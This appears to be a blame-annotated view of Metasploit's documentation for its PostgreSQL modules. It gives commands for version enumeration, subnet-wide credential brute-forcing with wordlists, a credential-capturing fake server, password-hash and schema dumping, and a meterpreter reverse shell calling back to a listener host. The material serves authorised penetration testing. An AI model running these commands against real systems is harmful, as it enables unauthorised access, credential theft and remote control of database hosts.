2022-04-21 21:18:56 +01:00
|
|
|
## PostgreSQL
|
|
|
|
|
|
|
|
|
|
For instance, when running a PostgreSQL instance:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### PostgreSQL Enumeration
|
|
|
|
|
|
|
|
|
|
Enumerate version:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_version
|
|
|
|
|
run postgres://192.168.123.13
|
|
|
|
|
run postgres://postgres:password@192.168.123.13
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### PostgreSQL Login / Bruteforce
|
|
|
|
|
|
|
|
|
|
If you have PostgreSQL credentials to validate:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_login
|
|
|
|
|
run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Re-using PostgreSQL credentials in a subnet:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_login
|
|
|
|
|
run cidr:/24:myspostgresl://user:pass@192.168.222.0 threads=50
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Using an alternative port:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_login
|
|
|
|
|
run postgres://user:pass@192.168.123.6:2222
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Brute-force host with known user and password list:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_login
|
2022-04-22 14:28:34 +01:00
|
|
|
run postgres://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt
|
2022-04-21 21:18:56 +01:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Brute-force credentials:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_login
|
2022-04-22 14:28:34 +01:00
|
|
|
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt
|
2022-04-21 21:18:56 +01:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Brute-force credentials in a subnet:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_login
|
|
|
|
|
run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
|
2022-04-22 14:28:34 +01:00
|
|
|
run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./wordlist.txt
|
2022-04-21 21:18:56 +01:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### PostgreSQL Capture Server
|
|
|
|
|
|
|
|
|
|
Captures and log PostgreSQL credentials:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/server/capture/postgresql
|
|
|
|
|
run
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
For example, if a client connects with:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
psql postgres://postgres:mysecretpassword@localhost:5432
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Metasploit's output will be:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf6 auxiliary(server/capture/postgresql) >
|
|
|
|
|
[*] Started service listener on 0.0.0.0:5432
|
|
|
|
|
[*] Server started.
|
|
|
|
|
[+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### PostgreSQL Dumping
|
|
|
|
|
|
|
|
|
|
User and hash dump:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_hashdump
|
|
|
|
|
run postgres://postgres:password@192.168.123.13
|
|
|
|
|
run postgres://postgres:password@192.168.123.13/database_name
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Schema dump:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/scanner/postgres/postgres_schemadump
|
|
|
|
|
run postgres://postgres:password@192.168.123.13
|
|
|
|
|
run postgres://postgres:password@192.168.123.13 ignored_databases=template1,template0,postgres
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### PostgreSQL Querying
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use auxiliary/admin/postgres/postgres_sql
|
|
|
|
|
run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### PostgreSQL Reverse Shell
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
use exploit/linux/postgres/postgres_payload
|
|
|
|
|
run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
|
2022-04-22 14:28:34 +01:00
|
|
|
```
|
